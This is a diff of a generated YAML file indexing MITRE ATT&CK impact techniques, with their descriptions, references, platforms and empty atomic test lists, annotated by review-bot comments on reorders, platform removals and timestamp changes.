- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Process: Process Termination'
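Review bot: the same line-break artifact shows in the T1489 detection text, where `ChangeServiceConfigW` and `may be used by an adversary` are split across two lines of the block scalar; this hunk does not touch those lines, but since the object is being regenerated it is worth checking that the block scalar round-trips without a stray newline. Beyond that the hunk is a reorder of kill_chain_phases, x_mitre_domains and x_mitre_platforms, with x_mitre_version unchanged at '1.2'.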
@@ -57733,39 +58492,37 @@ impact:
- 'Service: Service Metadata'
x_mitre_impact_type:
- Availability
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ created: '2019-03-29T19:00:55.901Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1489
+ external_id: T1489
+ - source_name: SecureWorks WannaCry Analysis
+ description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+ Analysis. Retrieved March 26, 2019.
+ url: https://www.secureworks.com/research/wcry-ransomware-analysis
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Novetta Blockbuster
+ description: 'Novetta Threat Research Group. (2016, February 24). Operation
+ Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+ 25, 2016.'
+ url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1489
atomic_tests: []
T1499.004:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
- type: attack-pattern
- created: '2020-02-20T15:37:27.052Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1499.004
- url: https://attack.mitre.org/techniques/T1499/004
- - source_name: Sucuri BIND9 August 2015
- url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
- description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
- in the Wild. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T15:42:23.001Z'
name: Application or System Exploitation
description: "Adversaries may exploit software vulnerabilities that can cause
an application or system to crash and deny availability to users. (Citation:
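Review bot: the platform list for T1499.004 loses Azure AD, Office 365, SaaS and Google Workspace in this hunk, with the replacement list emitted later in the same object; any per-platform index derived from this file that listed T1499.004 under those platforms has to be regenerated in the same change, and the PR description should call out the platform removals because consumers filtering on those names will stop seeing the technique.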
@@ -57783,13 +58540,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Attacks targeting web applications may generate logs in the
web server, application server, and/or database server that can be used to
identify the type of attack. Externally monitor the availability of services
that may be targeted by an Endpoint DoS.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -57797,36 +58561,27 @@ impact:
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1565.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
type: attack-pattern
- created: '2020-03-02T14:30:05.252Z'
+ id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+ created: '2020-02-20T15:37:27.052Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.003
- url: https://attack.mitre.org/techniques/T1565/003
- - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- url: https://content.fireeye.com/apt/rpt-apt38
- source_name: FireEye APT38 Oct 2018
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1499/004
+ external_id: T1499.004
+ - source_name: Sucuri BIND9 August 2015
+ description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+ in the Wild. Retrieved April 26, 2019.
+ url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1565.003:
+ technique:
+ modified: '2024-10-15T18:21:43.760Z'
name: Runtime Data Manipulation
description: |-
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
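Review bot: what reads here as deleting T1565.003's id, created date and external_references is a reorder: the object header is moved out from between the trailing T1499.004 fields and T1565.003's own body and re-emitted further down, and the mitre-attack, DOJ Lazarus Sony 2018 and FireEye APT38 Oct 2018 entries reappear with the same source_name values. The only value change in the hunk is T1565.003's modified timestamp moving to 2024-10-15.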
@@ -57835,11 +58590,17 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Inspect important application binary file hashes, locations,
and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'File: File Deletion'
@@ -57848,17 +58609,31 @@ impact:
- 'File: File Creation'
x_mitre_impact_type:
- Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ created: '2020-03-02T14:30:05.252Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/003
+ external_id: T1565.003
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1498.002:
technique:
- modified: '2023-03-30T21:01:41.052Z'
+ modified: '2024-10-15T16:04:34.495Z'
name: Reflection Amplification
description: |-
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
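Review bot: x_mitre_permissions_required (User, Administrator, root, SYSTEM) is dropped from T1565.003 with no replacement key, which is consistent with the bump to x_mitre_version '1.2' but will silently lose data for any index or filter keyed on that field; list the removed field in the PR description. The re-emitted DOJ Lazarus Sony 2018 and FireEye APT38 Oct 2018 references match the T1565.001 entries above, including the new mandiant.com URL, so the two sub-techniques stay consistent.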
@@ -57867,6 +58642,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -57882,17 +58658,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Sensor Health: Host Status'
- 'Network Traffic: Network Traffic Flow'
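Review bot: T1498.002 gets the same platform consolidation as T1499.004, dropping Azure AD, Office 365, SaaS and Google Workspace and moving x_mitre_version to '1.4'; T1499.002 receives the identical treatment further down this diff. These are fine as a set provided the per-platform indexes are regenerated in the same change rather than left pointing at platforms the techniques no longer declare.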
@@ -57902,14 +58673,15 @@ impact:
id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
created: '2020-03-02T20:08:03.691Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1498/002
external_id: T1498.002
- - source_name: Cloudflare ReflectionDoS May 2017
- description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
- (attacks). Retrieved April 23, 2019.
- url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- source_name: Cloudflare DNSamplficationDoS
description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
April 23, 2019.
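Review bot: the Cloudflare ReflectionDoS May 2017 reference is removed at this position while the T1498.002 description still cites (Citation: Cloudflare ReflectionDoS May 2017); the entry is re-added lower in the list in the next hunk, so the net effect is a reorder, but read on its own this hunk looks like it leaves a dangling citation. Sorting external_references by source_name in the generator would stop these reorder-only diffs from appearing.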
@@ -57918,28 +58690,28 @@ impact:
description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
April 23, 2019.
url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+ - source_name: Cloudflare ReflectionDoS May 2017
+ description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+ (attacks). Retrieved April 23, 2019.
+ url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cloudflare Memcrashed Feb 2018
+ description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+ - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+ url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- source_name: Arbor AnnualDoSreport Jan 2018
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
Infrastructure Security Report. Retrieved April 22, 2019.
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- - source_name: Cloudflare Memcrashed Feb 2018
- description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
- - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
- url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- - source_name: Cisco DoSdetectNetflow
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1499.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:05:48.014Z'
name: Service Exhaustion Flood
description: |-
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
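Review bot: the context lines carry upstream typos in reference descriptions ("amplificaiton", "Marek Majkowsk"); they are not introduced by this change and should not be hand-edited in a generated file, but they are worth reporting upstream so the next regeneration picks up the fix. Within this hunk the spec-version swap to 3.2.0 and the added x_mitre_modified_by_ref match the other objects.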
@@ -57950,7 +58722,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -57961,17 +58732,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -58008,7 +58774,8 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491:
technique:
@@ -58029,7 +58796,7 @@ impact:
- source_name: mitre-attack
external_id: T1491
url: https://attack.mitre.org/techniques/T1491
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:42.056Z'
name: Defacement
description: "Adversaries may modify visual content available internally or
externally to an enterprise network, thus affecting the integrity of the original
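Review bot: the T1491 modified timestamp moves backward from 2022-05-11 to 2022-03-25, the same regression seen for T1561 earlier in this diff. If the upstream bundle deliberately restated these dates, say so in the PR description; otherwise this object may have been regenerated from an older source than the rest of the file.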
@@ -58056,12 +58823,78 @@ impact:
x_mitre_impact_type:
- Integrity
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ atomic_tests: []
+ T1496.002:
+ technique:
+ modified: '2024-09-25T14:59:35.287Z'
+ name: Bandwidth Hijacking
+ description: "Adversaries may leverage the network bandwidth resources of co-opted
+ systems to complete resource-intensive tasks, which may impact system and/or
+ hosted service availability. \n\nAdversaries may also use malware that leverages
+ a system's network bandwidth as part of a botnet in order to facilitate [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+ to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+ in proxyjacking by selling use of the victims' network bandwidth and IP address
+ to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+ in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+ Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+ financial costs or availability disruptions, this technique may cause reputational
+ damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+ Proxyjacking)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - IaaS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'File: File Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Connection Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+ created: '2024-09-25T13:44:35.412Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/002
+ external_id: T1496.002
+ - source_name: Sysdig Proxyjacking
+ description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+ Chat. Retrieved July 6, 2023.
+ url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+ - source_name: Unit 42 Leaked Environment Variables 2024
+ description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+ Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+ Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+ url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+ - source_name: GoBotKR
+ description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+ Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+ url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1657:
technique:
- modified: '2024-04-11T20:22:14.359Z'
+ modified: '2024-10-15T15:58:10.254Z'
name: Financial Theft
description: "Adversaries may steal monetary resources from targets through
extortion, social engineering, technical theft, or other methods aimed at
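Review bot: T1491 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` here and receives no replacement, so after this change it ends at `x_mitre_is_subtechnique: false` followed directly by `atomic_tests: []`, whereas every other object in this diff swaps 2.1.0 for `x_mitre_attack_spec_version: 3.2.0` and adds an `x_mitre_modified_by_ref`. Check whether T1491 was actually refreshed from the new bundle or whether the generator emitted a partial object. The new T1496.002 (Bandwidth Hijacking) entry arriving with `x_mitre_detection: ''` and `atomic_tests: []` is expected for a technique with no detection text upstream and no atomics yet; its `Containers` platform value is new to this file and should be accounted for wherever platforms are enumerated.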
@@ -58094,7 +58927,7 @@ impact:
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -58104,10 +58937,9 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
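Review bot: T1657's platform list replaces Office 365 and Google Workspace with the consolidated `Office Suite` value and bumps x_mitre_version to '1.2'; tooling or indexes that filter on the old platform names will no longer match this technique, so the rename belongs in the PR description alongside the other platform removals in this change.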
@@ -58170,7 +59002,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1491.001:
technique:
@@ -58211,7 +59042,7 @@ impact:
messages. Since internally defacing systems exposes an adversary''s presence,
it often takes place after other intrusion goals have been accomplished.(Citation:
Novetta Blockbuster Destructive Malware)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-28T18:55:35.988Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Defacement: Internal Defacement'
x_mitre_detection: Monitor internal and websites for unplanned content changes.
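Review bot: T1491.001's modified timestamp also regresses, from 2022-11-08 to 2022-07-28, matching the pattern for T1491 and T1561; confirm these three objects came from the intended bundle version before merging rather than from a cached older copy.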
@@ -58232,9 +59063,157 @@ impact:
- Integrity
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1491.001
atomic_tests: []
+ T1496.004:
+ technique:
+ modified: '2024-10-16T17:59:27.535Z'
+ name: Cloud Service Hijacking
+ description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+ applications to complete resource-intensive tasks, which may impact hosted
+ service availability. \n\nFor example, adversaries may leverage email and
+ messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+ Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+ spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+ messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+ 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+ in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+ AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+ 2024)\n\nIn some cases, adversaries may leverage services that the victim
+ is already using. In others, particularly when the service is part of a larger
+ cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+ 2024) Leveraging SaaS applications may cause the victim to incur significant
+ financial costs, use up service quotas, and otherwise impact availability. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+ created: '2024-09-25T14:05:59.910Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/004
+ external_id: T1496.004
+ - source_name: SentinelLabs SNS Sender 2024
+ description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+ Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+ url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+ - source_name: Lacework LLMJacking 2024
+ description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+ with Composite Alerts. Retrieved September 25, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+ - source_name: Sysdig LLMJacking 2024
+ description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+ (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+ - source_name: Permiso SES Abuse 2023
+ description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+ 25, 2024.
+ url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.001:
+ technique:
+ modified: '2024-10-13T16:58:38.820Z'
+ name: Compute Hijacking
+ description: "Adversaries may leverage the compute resources of co-opted systems
+ to complete resource-intensive tasks, which may impact system and/or hosted
+ service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ is to validate transactions of cryptocurrency networks and earn virtual currency.
+ Adversaries may consume enough system resources to negatively impact and/or
+ cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+ Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+ because of the high potential for available resources, but user endpoint systems
+ may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+ environments may also be targeted due to the ease of deployment via exposed
+ APIs and the potential for scaling mining activities by deploying or compromising
+ multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+ Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+ cryptocurrency mining malware identify then kill off processes for competing
+ malware to ensure it’s not competing for resources.(Citation: Trend Micro
+ War of Crypto Miners)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Network Traffic: Network Connection Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Sensor Health: Host Status'
+ - 'Process: Process Creation'
+ - 'File: File Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+ created: '2024-09-25T13:34:30.100Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/001
+ external_id: T1496.001
+ - source_name: Unit 42 Hildegard Malware
+ description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+ Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+ url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+ - source_name: CloudSploit - Unused AWS Regions
+ description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+ Retrieved October 8, 2019.
+ url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+ - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+ description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+ 17, 2019.
+ url: https://securelist.com/lazarus-under-the-hood/77908/
+ - source_name: Trend Micro Exposed Docker APIs
+ description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+ via Exposed APIs. Retrieved April 6, 2021.
+ url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+ - source_name: Trend Micro War of Crypto Miners
+ description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+ Miners: A Battle for Resources. Retrieved April 6, 2021.'
+ url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
